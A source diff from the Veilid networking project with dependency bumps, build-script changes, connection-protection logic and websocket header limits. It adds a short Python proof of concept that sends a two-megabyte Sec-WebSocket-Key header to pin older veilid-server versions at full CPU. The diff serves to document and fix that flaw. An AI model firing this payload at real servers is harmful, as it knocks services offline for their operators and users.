-    echo capnproto compiler ^(capnp^) is required but it's not installed. Install capnp 0.10.4 or higher. Ensure it is in your path. Aborting.
-    echo capnp is available here: https://capnproto.org/capnproto-c++-win32-0.10.4.zip
+    echo capnproto compiler ^(capnp^) is required but it's not installed. Install capnp 1.0.1 or higher. Ensure it is in your path. Aborting.
+    echo capnp is available here: https://capnproto.org/capnproto-c++-win32-1.0.1.zip
     goto end
 )
doc/security/poc/large-websocket-key-v0.2.2.py (new file, 7 lines)
@@ -0,0 +1,7 @@
+# When pointed at veilid-server 0.2.2 or earlier, this will cause 100% CPU utilization
+
+import socket
+s = socket.socket()
+s.connect(('127.0.0.1',5150))
+s.send(f"GET /ws HTTP/1.1\r\nSec-WebSocket-Version: 13\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Key: {'A'*2000000}\r\n\r\n".encode())
+s.close()
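
For context: the websocket handling change later in this diff (ws.rs) introduces MAX_WS_HEADERS = 24, MAX_WS_HEADER_LENGTH = 512, and MAX_WS_BEFORE_BODY = 2048, and peeks at most MAX_WS_BEFORE_BODY bytes under a timeout instead of waiting for the full request, which appears to be the mitigation this proof of concept exercises.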
@@ -10,4 +10,4 @@ cp -rf /veilid/package/rpm/veilid-server/veilid-server.spec /root/rpmbuild/SPECS
 /veilid/package/replace_variable.sh /root/rpmbuild/SPECS/veilid-server.spec CARGO_ARCH $CARGO_ARCH

 # build the rpm
-rpmbuild --target "x86_64" -bb /root/rpmbuild/SPECS/veilid-server.spec
+rpmbuild --target "$ARCH" -bb /root/rpmbuild/SPECS/veilid-server.spec
scripts/earthly/install_capnproto.sh
@@ -1,9 +1,16 @@
 #!/bin/bash
+SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
+if [ -f ".capnp_version" ]; then
+    CAPNPROTO_VERSION=$(cat ".capnp_version")
+else
+    CAPNPROTO_VERSION=$(cat "$SCRIPTDIR/../../.capnp_version")
+fi
+
 mkdir /tmp/capnproto-install
 pushd /tmp/capnproto-install
-curl -O https://capnproto.org/capnproto-c++-0.10.4.tar.gz
-tar zxf capnproto-c++-0.10.4.tar.gz
-cd capnproto-c++-0.10.4
+curl -O https://capnproto.org/capnproto-c++-${CAPNPROTO_VERSION}.tar.gz
+tar zxf capnproto-c++-${CAPNPROTO_VERSION}.tar.gz
+cd capnproto-c++-${CAPNPROTO_VERSION}
 ./configure --without-openssl
 make -j$1 check
 if [ "$EUID" -ne 0 ]; then
scripts/earthly/install_protoc.sh
@@ -1,13 +1,28 @@
 #!/bin/bash
-VERSION=23.3
+SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
+if [ -f ".protoc_version" ]; then
+    PROTOC_VERSION=$(cat ".protoc_version")
+else
+    PROTOC_VERSION=$(cat "$SCRIPTDIR/../../.protoc_version")
+fi
+
+UNAME_M=$(uname -m)
+if [[ "$UNAME_M" == "x86_64" ]]; then
+    PROTOC_ARCH=x86_64
+elif [[ "$UNAME_M" == "aarch64" ]]; then
+    PROTOC_ARCH=aarch_64
+else
+    echo Unsupported build architecture
+    exit 1
+fi

 mkdir /tmp/protoc-install
 pushd /tmp/protoc-install
-curl -OL https://github.com/protocolbuffers/protobuf/releases/download/v$VERSION/protoc-$VERSION-linux-x86_64.zip
-unzip protoc-$VERSION-linux-x86_64.zip
+curl -OL https://github.com/protocolbuffers/protobuf/releases/download/v$PROTOC_VERSION/protoc-$PROTOC_VERSION-linux-$PROTOC_ARCH.zip
+unzip protoc-$PROTOC_VERSION-linux-$PROTOC_ARCH.zip
 if [ "$EUID" -ne 0 ]; then
     if command -v checkinstall &> /dev/null; then
-        sudo checkinstall --pkgversion=$VERSION -y cp -r bin include /usr/local/
+        sudo checkinstall --pkgversion=$PROTOC_VERSION -y cp -r bin include /usr/local/
         cp *.deb ~
     else
         sudo cp -r bin include /usr/local/
@@ -16,7 +31,7 @@ if [ "$EUID" -ne 0 ]; then
     sudo rm -rf /tmp/protoc-install
 else
     if command -v checkinstall &> /dev/null; then
-        checkinstall --pkgversion=$VERSION -y cp -r bin include /usr/local/
+        checkinstall --pkgversion=$PROTOC_VERSION -y cp -r bin include /usr/local/
         cp *.deb ~
     else
         cp -r bin include /usr/local/
veilid-cli/Cargo.toml
@@ -1,7 +1,7 @@
 [package]
 # --- Bumpversion match - do not reorder
 name = "veilid-cli"
-version = "0.2.1"
+version = "0.2.3"
 # ---
 authors = ["Veilid Team <contact@veilid.com>"]
 edition = "2021"
@@ -21,13 +21,13 @@ rt-async-std = [
 rt-tokio = ["tokio", "tokio-util", "veilid-tools/rt-tokio", "cursive/rt-tokio"]

 [dependencies]
-async-std = { version = "^1.9", features = [
+async-std = { version = "^1.12", features = [
     "unstable",
     "attributes",
 ], optional = true }
 tokio = { version = "^1", features = ["full"], optional = true }
 tokio-util = { version = "^0", features = ["compat"], optional = true }
-async-tungstenite = { version = "^0.8" }
+async-tungstenite = { version = "^0.23" }
 cursive = { git = "https://gitlab.com/veilid/cursive.git", default-features = false, features = [
     "crossterm",
     "toml",
@@ -38,10 +38,10 @@ cursive_buffered_backend = { git = "https://gitlab.com/veilid/cursive-buffered-b
 # cursive-multiplex = "0.6.0"
 # cursive_tree_view = "0.6.0"
 cursive_table_view = "0.14.0"
-arboard = "3.2.0"
+arboard = "3.2.1"
 # cursive-tabs = "0.5.0"
 clap = { version = "4", features = ["derive"] }
-directories = "^4"
+directories = "^5"
 log = "^0"
 futures = "^0"
 serde = "^1"
@@ -54,7 +54,7 @@ flexi_logger = { version = "^0", features = ["use_chrono_for_offset"] }
 thiserror = "^1"
 crossbeam-channel = "^0"
 hex = "^0"
-veilid-tools = { version = "0.2.0", path = "../veilid-tools" }
+veilid-tools = { version = "0.2.3", path = "../veilid-tools" }

 json = "^0"
 stop-token = { version = "^0", default-features = false }
@@ -63,4 +63,4 @@ data-encoding = { version = "^2" }
 indent = { version = "0.1.1" }

 [dev-dependencies]
-serial_test = "^0"
+serial_test = "^2"
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-core"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = "Core library used to create a Veilid node and operate it as part of an application"
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
@ -59,14 +59,14 @@ network-result-extra = ["veilid-tools/network-result-extra"]
|
||||
[dependencies]
|
||||
|
||||
# Tools
|
||||
veilid-tools = { version = "0.2.0", path = "../veilid-tools", features = [
|
||||
veilid-tools = { version = "0.2.3", path = "../veilid-tools", features = [
|
||||
"tracing",
|
||||
], default-features = false }
|
||||
paste = "1.0.14"
|
||||
once_cell = "1.18.0"
|
||||
owning_ref = "0.4.1"
|
||||
backtrace = "0.3.68"
|
||||
num-traits = "0.2.15"
|
||||
backtrace = "0.3.69"
|
||||
num-traits = "0.2.16"
|
||||
shell-words = "1.1.0"
|
||||
static_assertions = "1.1.0"
|
||||
cfg-if = "1.0.0"
|
||||
@ -79,20 +79,19 @@ tracing = { version = "0.1.37", features = ["log", "attributes"] }
|
||||
tracing-subscriber = "0.3.17"
|
||||
tracing-error = "0.2.0"
|
||||
eyre = "0.6.8"
|
||||
thiserror = "1.0.47"
|
||||
thiserror = "1.0.48"
|
||||
|
||||
# Data structures
|
||||
enumset = { version = "1.1.2", features = ["serde"] }
|
||||
keyvaluedb = "0.1.0"
|
||||
range-set-blaze = "0.1.9"
|
||||
weak-table = "0.3.2"
|
||||
generic-array = "0.14.7"
|
||||
hashlink = { package = "veilid-hashlink", version = "0.1.0", features = [
|
||||
"serde_impl",
|
||||
] }
|
||||
|
||||
# System
|
||||
futures-util = { version = "0.3.28", default_features = false, features = [
|
||||
futures-util = { version = "0.3.28", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
flume = { version = "0.11.0", features = ["async"] }
|
||||
@ -101,19 +100,19 @@ lock_api = "0.4.10"
|
||||
stop-token = { version = "0.7.0", default-features = false }
|
||||
|
||||
# Crypto
|
||||
ed25519-dalek = { version = "2.0.0", default_features = false, features = [
|
||||
ed25519-dalek = { version = "2.0.0", default-features = false, features = [
|
||||
"alloc",
|
||||
"rand_core",
|
||||
"digest",
|
||||
"zeroize",
|
||||
] }
|
||||
x25519-dalek = { version = "2.0.0", default_features = false, features = [
|
||||
x25519-dalek = { version = "2.0.0", default-features = false, features = [
|
||||
"alloc",
|
||||
"static_secrets",
|
||||
"zeroize",
|
||||
"precomputed-tables",
|
||||
] }
|
||||
curve25519-dalek = { version = "4.0.0", default_features = false, features = [
|
||||
curve25519-dalek = { version = "4.1.0", default-features = false, features = [
|
||||
"alloc",
|
||||
"zeroize",
|
||||
"precomputed-tables",
|
||||
@ -121,21 +120,21 @@ curve25519-dalek = { version = "4.0.0", default_features = false, features = [
|
||||
blake3 = { version = "1.4.1" }
|
||||
chacha20poly1305 = "0.10.1"
|
||||
chacha20 = "0.9.1"
|
||||
argon2 = "0.5.1"
|
||||
argon2 = "0.5.2"
|
||||
|
||||
# Network
|
||||
async-std-resolver = { version = "0.22.0", optional = true }
|
||||
trust-dns-resolver = { version = "0.22.0", optional = true }
|
||||
enum-as-inner = "=0.5.1" # temporary fix for trust-dns-resolver v0.22.0
|
||||
async-std-resolver = { version = "0.23.0", optional = true }
|
||||
trust-dns-resolver = { version = "0.23.0", optional = true }
|
||||
enum-as-inner = "=0.6.0" # temporary fix for trust-dns-resolver v0.22.0
|
||||
|
||||
# Serialization
|
||||
capnp = { version = "0.17.2", default_features = false }
|
||||
serde = { version = "1.0.183", features = ["derive"] }
|
||||
serde_json = { version = "1.0.105" }
|
||||
capnp = { version = "0.18.1", default-features = false, features = [ "alloc" ] }
|
||||
serde = { version = "1.0.188", features = ["derive"] }
|
||||
serde_json = { version = "1.0.107" }
|
||||
serde-big-array = "0.5.1"
|
||||
json = "0.12.4"
|
||||
data-encoding = { version = "2.4.0" }
|
||||
schemars = "0.8.12"
|
||||
schemars = "0.8.13"
|
||||
lz4_flex = { version = "0.11.1", default-features = false, features = [
|
||||
"safe-encode",
|
||||
"safe-decode",
|
||||
@ -148,9 +147,9 @@ lz4_flex = { version = "0.11.1", default-features = false, features = [
|
||||
# Tools
|
||||
config = { version = "0.13.3", features = ["yaml"] }
|
||||
bugsalot = { package = "veilid-bugsalot", version = "0.1.0" }
|
||||
chrono = "0.4.26"
|
||||
libc = "0.2.147"
|
||||
nix = "0.26.2"
|
||||
chrono = "0.4.31"
|
||||
libc = "0.2.148"
|
||||
nix = "0.27.1"
|
||||
|
||||
# System
|
||||
async-std = { version = "1.12.0", features = ["unstable"], optional = true }
|
||||
@ -170,24 +169,24 @@ keyring-manager = "0.5.0"
|
||||
keyvaluedb-sqlite = "0.1.0"
|
||||
|
||||
# Network
|
||||
async-tungstenite = { version = "0.23.0", features = ["async-tls"] }
|
||||
async-tungstenite = { version = "0.23.0", features = [ "async-tls" ] }
|
||||
igd = { package = "veilid-igd", version = "0.1.0" }
|
||||
async-tls = "0.12.0"
|
||||
webpki = "0.22.0"
|
||||
webpki = "0.22.1"
|
||||
webpki-roots = "0.25.2"
|
||||
rustls = "0.20.8"
|
||||
rustls = "=0.20.9"
|
||||
rustls-pemfile = "1.0.3"
|
||||
socket2 = { version = "0.5.3", features = ["all"] }
|
||||
socket2 = { version = "0.5.4", features = ["all"] }
|
||||
|
||||
# Dependencies for WASM builds only
|
||||
[target.'cfg(target_arch = "wasm32")'.dependencies]
|
||||
|
||||
veilid-tools = { version = "0.2.0", path = "../veilid-tools", default-features = false, features = [
|
||||
veilid-tools = { version = "0.2.3", path = "../veilid-tools", default-features = false, features = [
|
||||
"rt-wasm-bindgen",
|
||||
] }
|
||||
|
||||
# Tools
|
||||
getrandom = { version = "0.2.4", features = ["js"] }
|
||||
getrandom = { version = "0.2.10", features = ["js"] }
|
||||
|
||||
# System
|
||||
async_executors = { version = "0.7.0", default-features = false, features = [
|
||||
@ -200,7 +199,7 @@ js-sys = "0.3.64"
|
||||
wasm-bindgen-futures = "0.4.37"
|
||||
send_wrapper = { version = "0.6.0", features = ["futures"] }
|
||||
tsify = { version = "0.4.5", features = ["js"] }
|
||||
serde-wasm-bindgen = "0.5.0"
|
||||
serde-wasm-bindgen = "0.6.0"
|
||||
|
||||
# Network
|
||||
ws_stream_wasm = "0.7.4"
|
||||
@ -242,9 +241,9 @@ ifstructs = "0.1.1"
|
||||
|
||||
# Dependencies for Linux or Android
|
||||
[target.'cfg(any(target_os = "android", target_os = "linux"))'.dependencies]
|
||||
rtnetlink = { version = "=0.13.0", default-features = false }
|
||||
rtnetlink = { version = "=0.13.1", default-features = false }
|
||||
netlink-sys = { version = "=0.8.5" }
|
||||
netlink-packet-route = { version = "=0.17.0" }
|
||||
netlink-packet-route = { version = "=0.17.1" }
|
||||
|
||||
# Dependencies for Windows
|
||||
[target.'cfg(target_os = "windows")'.dependencies]
|
||||
@ -282,7 +281,7 @@ wasm-logger = "0.2.0"
|
||||
### BUILD OPTIONS
|
||||
|
||||
[build-dependencies]
|
||||
capnpc = "0.17.2"
|
||||
capnpc = "0.18.0"
|
||||
|
||||
[package.metadata.wasm-pack.profile.release]
|
||||
wasm-opt = ["-O", "--enable-mutable-globals"]
|
||||
|
@ -1,4 +1,119 @@
|
||||
use std::path::PathBuf;
|
||||
use std::process::{Command, Stdio};
|
||||
|
||||
fn search_file<T: AsRef<str>, P: AsRef<str>>(start: T, name: P) -> Option<PathBuf> {
|
||||
let start_path = PathBuf::from(start.as_ref()).canonicalize().ok();
|
||||
let mut path = start_path.as_ref().map(|x| x.as_path());
|
||||
while let Some(some_path) = path {
|
||||
let file_path = some_path.join(name.as_ref());
|
||||
if file_path.exists() {
|
||||
return Some(file_path.to_owned());
|
||||
}
|
||||
path = some_path.parent();
|
||||
}
|
||||
None
|
||||
}
|
||||
|
||||
fn get_desired_capnp_version_string() -> String {
|
||||
let capnp_path = search_file(env!("CARGO_MANIFEST_DIR"), ".capnp_version")
|
||||
.expect("should find .capnp_version file");
|
||||
std::fs::read_to_string(&capnp_path)
|
||||
.expect(&format!(
|
||||
"can't read .capnp_version file here: {:?}",
|
||||
capnp_path
|
||||
))
|
||||
.trim()
|
||||
.to_owned()
|
||||
}
|
||||
|
||||
fn get_capnp_version_string() -> String {
|
||||
let output = Command::new("capnp")
|
||||
.arg("--version")
|
||||
.stdout(Stdio::piped())
|
||||
.output()
|
||||
.expect("capnp was not in the PATH");
|
||||
let s = String::from_utf8(output.stdout)
|
||||
.expect("'capnp --version' output was not a valid string")
|
||||
.trim()
|
||||
.to_owned();
|
||||
|
||||
if !s.starts_with("Cap'n Proto version ") {
|
||||
panic!("invalid capnp version string: {}", s);
|
||||
}
|
||||
s[20..].to_owned()
|
||||
}
|
||||
|
||||
fn get_desired_protoc_version_string() -> String {
|
||||
let protoc_path = search_file(env!("CARGO_MANIFEST_DIR"), ".protoc_version")
|
||||
.expect("should find .protoc_version file");
|
||||
std::fs::read_to_string(&protoc_path)
|
||||
.expect(&format!(
|
||||
"can't read .protoc_version file here: {:?}",
|
||||
protoc_path
|
||||
))
|
||||
.trim()
|
||||
.to_owned()
|
||||
}
|
||||
|
||||
fn get_protoc_version_string() -> String {
|
||||
let output = Command::new("protoc")
|
||||
.arg("--version")
|
||||
.stdout(Stdio::piped())
|
||||
.output()
|
||||
.expect("protoc was not in the PATH");
|
||||
let s = String::from_utf8(output.stdout)
|
||||
.expect("'protoc --version' output was not a valid string")
|
||||
.trim()
|
||||
.to_owned();
|
||||
|
||||
if !s.starts_with("libprotoc ") {
|
||||
panic!("invalid protoc version string: {}", s);
|
||||
}
|
||||
s[10..].to_owned()
|
||||
}
|
||||
|
||||
fn main() {
|
||||
let desired_capnp_version_string = get_desired_capnp_version_string();
|
||||
let capnp_version_string = get_capnp_version_string();
|
||||
let desired_protoc_version_string = get_desired_protoc_version_string();
|
||||
let protoc_version_string = get_protoc_version_string();
|
||||
|
||||
// Check capnp version
|
||||
let desired_capnp_major_version =
|
||||
usize::from_str_radix(desired_capnp_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int");
|
||||
|
||||
if usize::from_str_radix(capnp_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int")
|
||||
!= desired_capnp_major_version
|
||||
{
|
||||
panic!(
|
||||
"capnproto version should be major version 1, preferably {} but is {}",
|
||||
desired_capnp_version_string, capnp_version_string
|
||||
);
|
||||
} else if capnp_version_string != desired_capnp_version_string {
|
||||
println!(
|
||||
"capnproto version may be untested: {}",
|
||||
capnp_version_string
|
||||
);
|
||||
}
|
||||
|
||||
// Check protoc version
|
||||
let desired_protoc_major_version =
|
||||
usize::from_str_radix(desired_protoc_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int");
|
||||
if usize::from_str_radix(protoc_version_string.split_once(".").unwrap().0, 10)
|
||||
.expect("should be valid int")
|
||||
< desired_protoc_major_version
|
||||
{
|
||||
panic!(
|
||||
"protoc version should be at least major version {} but is {}",
|
||||
desired_protoc_major_version, protoc_version_string
|
||||
);
|
||||
} else if protoc_version_string != desired_protoc_version_string {
|
||||
println!("protoc version may be untested: {}", protoc_version_string);
|
||||
}
|
||||
|
||||
::capnpc::CompilerCommand::new()
|
||||
.file("proto/veilid.capnp")
|
||||
.run()
|
||||
|
@@ -1,8 +1,7 @@
-use curve25519_dalek::digest::generic_array::typenum::U64;
+use curve25519_dalek::digest::generic_array::{typenum::U64, GenericArray};
 use curve25519_dalek::digest::{
     Digest, FixedOutput, FixedOutputReset, Output, OutputSizeUser, Reset, Update,
 };
-use generic_array::GenericArray;

 pub struct Blake3Digest512 {
     dig: blake3::Hasher,
@@ -1,7 +1,6 @@
use super::*;

#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash)]
#[cfg_attr(target_arch = "wasm32", derive(Tsify), tsify(into_wasm_abi))]
pub struct CryptoTyped<K>
where
    K: Clone
@@ -1,9 +1,7 @@
use super::*;

#[derive(Clone, Debug, Serialize, Deserialize, PartialOrd, Ord, PartialEq, Eq, Hash, Default)]
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
#[serde(from = "Vec<CryptoTyped<K>>", into = "Vec<CryptoTyped<K>>")]
// TODO: figure out how to TS type this as `string`, since it's converted to string via the JSON API.
pub struct CryptoTypedGroup<K = PublicKey>
where
    K: Clone
@@ -7,9 +7,7 @@ use super::*;
    tsify(from_wasm_abi, into_wasm_abi)
)]
pub struct KeyPair {
    #[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
    pub key: PublicKey,
    #[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
    pub secret: SecretKey,
}
from_impl_to_jsvalue!(KeyPair);
@@ -25,7 +25,7 @@ cfg_if! {
 pub async fn resolver(
     config: config::ResolverConfig,
     options: config::ResolverOpts,
-) -> Result<AsyncResolver, ResolveError> {
+) -> AsyncResolver {
     AsyncResolver::tokio(config, options)
 }

@@ -62,7 +62,6 @@
config::ResolverOpts::default(),
)
.await
.expect("failed to connect resolver"),
};

*resolver_lock = Some(resolver.clone());
@ -139,6 +139,33 @@ impl ConnectionManager {
|
||||
debug!("finished connection manager shutdown");
|
||||
}
|
||||
|
||||
// Internal routine to see if we should keep this connection
|
||||
// from being LRU removed. Used on our initiated relay connections.
|
||||
fn should_protect_connection(&self, conn: &NetworkConnection) -> bool {
|
||||
let netman = self.network_manager();
|
||||
let routing_table = netman.routing_table();
|
||||
let remote_address = conn.connection_descriptor().remote_address().address();
|
||||
let Some(routing_domain) = routing_table.routing_domain_for_address(remote_address) else {
|
||||
return false;
|
||||
};
|
||||
let Some(rn) = routing_table.relay_node(routing_domain) else {
|
||||
return false;
|
||||
};
|
||||
let relay_nr = rn.filtered_clone(
|
||||
NodeRefFilter::new()
|
||||
.with_routing_domain(routing_domain)
|
||||
.with_address_type(conn.connection_descriptor().address_type())
|
||||
.with_protocol_type(conn.connection_descriptor().protocol_type()),
|
||||
);
|
||||
let dids = relay_nr.all_filtered_dial_info_details();
|
||||
for did in dids {
|
||||
if did.dial_info.address() == remote_address {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
false
|
||||
}
|
||||
|
||||
// Internal routine to register new connection atomically.
|
||||
// Registers connection in the connection table for later access
|
||||
// and spawns a message processing loop for the connection
|
||||
@ -163,8 +190,16 @@ impl ConnectionManager {
|
||||
None => bail!("not creating connection because we are stopping"),
|
||||
};
|
||||
|
||||
let conn = NetworkConnection::from_protocol(self.clone(), stop_token, prot_conn, id);
|
||||
let mut conn = NetworkConnection::from_protocol(self.clone(), stop_token, prot_conn, id);
|
||||
let handle = conn.get_handle();
|
||||
|
||||
// See if this should be a protected connection
|
||||
let protect = self.should_protect_connection(&conn);
|
||||
if protect {
|
||||
log_net!(debug "== PROTECTING connection: {} -> {}", id, conn.debug_print(get_aligned_timestamp()));
|
||||
conn.protect();
|
||||
}
|
||||
|
||||
// Add to the connection table
|
||||
match self.arc.connection_table.add_connection(conn) {
|
||||
Ok(None) => {
|
||||
@ -173,7 +208,7 @@ impl ConnectionManager {
|
||||
Ok(Some(conn)) => {
|
||||
// Connection added and a different one LRU'd out
|
||||
// Send it to be terminated
|
||||
log_net!(debug "== LRU kill connection due to limit: {:?}", conn);
|
||||
// log_net!(debug "== LRU kill connection due to limit: {:?}", conn);
|
||||
let _ = inner.sender.send(ConnectionManagerEvent::Dead(conn));
|
||||
}
|
||||
Err(ConnectionTableAddError::AddressFilter(conn, e)) => {
|
||||
@ -404,4 +439,12 @@ impl ConnectionManager {
|
||||
let _ = sender.send_async(ConnectionManagerEvent::Dead(conn)).await;
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn debug_print(&self) -> String {
|
||||
//let inner = self.arc.inner.lock();
|
||||
format!(
|
||||
"Connection Table:\n\n{}",
|
||||
self.arc.connection_table.debug_print_table()
|
||||
)
|
||||
}
|
||||
}
|
||||
|
@ -72,6 +72,15 @@ impl ConnectionTable {
|
||||
}
|
||||
}
|
||||
|
||||
fn index_to_protocol(idx: usize) -> ProtocolType {
|
||||
match idx {
|
||||
0 => ProtocolType::TCP,
|
||||
1 => ProtocolType::WS,
|
||||
2 => ProtocolType::WSS,
|
||||
_ => panic!("not a connection-oriented protocol"),
|
||||
}
|
||||
}
|
||||
|
||||
#[instrument(level = "trace", skip(self))]
|
||||
pub async fn join(&self) {
|
||||
let mut unord = {
|
||||
@ -175,10 +184,20 @@ impl ConnectionTable {
|
||||
// then drop the least recently used connection
|
||||
let mut out_conn = None;
|
||||
if inner.conn_by_id[protocol_index].len() > inner.max_connections[protocol_index] {
|
||||
if let Some((lruk, lru_conn)) = inner.conn_by_id[protocol_index].peek_lru() {
|
||||
while let Some((lruk, lru_conn)) = inner.conn_by_id[protocol_index].peek_lru() {
|
||||
let lruk = *lruk;
|
||||
log_net!(debug "connection lru out: {:?}", lru_conn);
|
||||
|
||||
// Don't LRU protected connections
|
||||
if lru_conn.is_protected() {
|
||||
// Mark as recently used
|
||||
log_net!(debug "== No LRU Out for PROTECTED connection: {} -> {}", lruk, lru_conn.debug_print(get_aligned_timestamp()));
|
||||
inner.conn_by_id[protocol_index].get(&lruk);
|
||||
continue;
|
||||
}
|
||||
|
||||
log_net!(debug "== LRU Connection Killed: {} -> {}", lruk, lru_conn.debug_print(get_aligned_timestamp()));
|
||||
out_conn = Some(Self::remove_connection_records(&mut *inner, lruk));
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
@ -331,4 +350,23 @@ impl ConnectionTable {
|
||||
let conn = Self::remove_connection_records(&mut *inner, id);
|
||||
Some(conn)
|
||||
}
|
||||
|
||||
pub fn debug_print_table(&self) -> String {
|
||||
let mut out = String::new();
|
||||
let inner = self.inner.lock();
|
||||
let cur_ts = get_aligned_timestamp();
|
||||
for t in 0..inner.conn_by_id.len() {
|
||||
out += &format!(
|
||||
" {} Connections: ({}/{})\n",
|
||||
Self::index_to_protocol(t).to_string(),
|
||||
inner.conn_by_id[t].len(),
|
||||
inner.max_connections[t]
|
||||
);
|
||||
|
||||
for (_, conn) in &inner.conn_by_id[t] {
|
||||
out += &format!(" {}\n", conn.debug_print(cur_ts));
|
||||
}
|
||||
}
|
||||
out
|
||||
}
|
||||
}
|
||||
|
@ -665,7 +665,7 @@ impl NetworkManager {
|
||||
#[instrument(level = "trace", skip(self), err)]
|
||||
pub async fn handle_signal(
|
||||
&self,
|
||||
connection_descriptor: ConnectionDescriptor,
|
||||
signal_connection_descriptor: ConnectionDescriptor,
|
||||
signal_info: SignalInfo,
|
||||
) -> EyreResult<NetworkResult<()>> {
|
||||
match signal_info {
|
||||
@ -689,8 +689,9 @@ impl NetworkManager {
|
||||
};
|
||||
|
||||
// Restrict reverse connection to same protocol as inbound signal
|
||||
let peer_nr = peer_nr
|
||||
.filtered_clone(NodeRefFilter::from(connection_descriptor.protocol_type()));
|
||||
let peer_nr = peer_nr.filtered_clone(NodeRefFilter::from(
|
||||
signal_connection_descriptor.protocol_type(),
|
||||
));
|
||||
|
||||
// Make a reverse connection to the peer and send the receipt to it
|
||||
rpc.rpc_call_return_receipt(Destination::direct(peer_nr), receipt)
|
||||
|
@ -33,7 +33,7 @@ impl Network {
|
||||
let server_config = self
|
||||
.load_server_config()
|
||||
.wrap_err("Couldn't create TLS configuration")?;
|
||||
let acceptor = TlsAcceptor::from(Arc::new(server_config));
|
||||
let acceptor = TlsAcceptor::from(server_config);
|
||||
self.inner.lock().tls_acceptor = Some(acceptor.clone());
|
||||
Ok(acceptor)
|
||||
}
|
||||
|
@ -1,10 +1,22 @@
|
||||
use super::*;
|
||||
|
||||
use async_tls::TlsConnector;
|
||||
use async_tungstenite::tungstenite::handshake::server::{
|
||||
Callback, ErrorResponse, Request, Response,
|
||||
};
|
||||
use async_tungstenite::tungstenite::http::StatusCode;
|
||||
use async_tungstenite::tungstenite::protocol::Message;
|
||||
use async_tungstenite::{accept_async, client_async, WebSocketStream};
|
||||
use async_tungstenite::{accept_hdr_async, client_async, WebSocketStream};
|
||||
use futures_util::{AsyncRead, AsyncWrite, SinkExt};
|
||||
use sockets::*;
|
||||
|
||||
/// Maximum number of websocket request headers to permit
|
||||
const MAX_WS_HEADERS: usize = 24;
|
||||
/// Maximum size of any one specific websocket header
|
||||
const MAX_WS_HEADER_LENGTH: usize = 512;
|
||||
/// Maximum total size of headers and request including newlines
|
||||
const MAX_WS_BEFORE_BODY: usize = 2048;
|
||||
|
||||
cfg_if! {
|
||||
if #[cfg(feature="rt-async-std")] {
|
||||
pub type WebsocketNetworkConnectionWSS =
|
||||
@ -180,29 +192,57 @@ impl WebsocketProtocolHandler {
|
||||
log_net!("WS: on_accept_async: enter");
|
||||
let request_path_len = self.arc.request_path.len() + 2;
|
||||
|
||||
let mut peekbuf: Vec<u8> = vec![0u8; request_path_len];
|
||||
if let Err(_) = timeout(
|
||||
let mut peek_buf = [0u8; MAX_WS_BEFORE_BODY];
|
||||
let peek_len = match timeout(
|
||||
self.arc.connection_initial_timeout_ms,
|
||||
ps.peek_exact(&mut peekbuf),
|
||||
ps.peek(&mut peek_buf),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Err(_) => {
|
||||
// Timeout
|
||||
return Ok(None);
|
||||
}
|
||||
Ok(Err(_)) => {
|
||||
// Peek error
|
||||
return Ok(None);
|
||||
}
|
||||
Ok(Ok(v)) => v,
|
||||
};
|
||||
|
||||
// If we can't peek at least our request path, then fail out
|
||||
if peek_len < request_path_len {
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
// Check for websocket path
|
||||
let matches_path = &peekbuf[0..request_path_len - 2] == self.arc.request_path.as_slice()
|
||||
&& (peekbuf[request_path_len - 2] == b' '
|
||||
|| (peekbuf[request_path_len - 2] == b'/'
|
||||
&& peekbuf[request_path_len - 1] == b' '));
|
||||
let matches_path = &peek_buf[0..request_path_len - 2] == self.arc.request_path.as_slice()
|
||||
&& (peek_buf[request_path_len - 2] == b' '
|
||||
|| (peek_buf[request_path_len - 2] == b'/'
|
||||
&& peek_buf[request_path_len - 1] == b' '));
|
||||
|
||||
if !matches_path {
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
let ws_stream = accept_async(ps)
|
||||
.await
|
||||
.map_err(|e| io_error_other!(format!("failed websockets handshake: {}", e)))?;
|
||||
// Check for double-CRLF indicating end of headers
|
||||
// if we don't find the end of the headers within MAX_WS_BEFORE_BODY
|
||||
// then we should bail, as this could be an attack or at best, something malformed
|
||||
// Yes, this restricts our handling to CRLF-conforming HTTP implementations
|
||||
// This check could be loosened if necessary, but until we have a reason to do so
|
||||
// a stricter interpretation of HTTP is possible and desirable to reduce attack surface
|
||||
|
||||
if peek_buf.windows(4).position(|w| w == b"\r\n\r\n").is_none() {
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
let ws_stream = match accept_hdr_async(ps, self.clone()).await {
|
||||
Ok(v) => v,
|
||||
Err(e) => {
|
||||
log_net!(debug "failed websockets handshake: {}", e);
|
||||
return Ok(None);
|
||||
}
|
||||
};
|
||||
|
||||
// Wrap the websocket in a NetworkConnection and register it
|
||||
let protocol_type = if self.arc.tls {
|
||||
@ -292,6 +332,24 @@ impl WebsocketProtocolHandler {
|
||||
}
|
||||
}
|
||||
|
||||
impl Callback for WebsocketProtocolHandler {
|
||||
fn on_request(self, request: &Request, response: Response) -> Result<Response, ErrorResponse> {
|
||||
// Cap the number of headers total and limit the size of all headers
|
||||
if request.headers().len() > MAX_WS_HEADERS
|
||||
|| request
|
||||
.headers()
|
||||
.iter()
|
||||
.find(|h| (h.0.as_str().len() + h.1.as_bytes().len()) > MAX_WS_HEADER_LENGTH)
|
||||
.is_some()
|
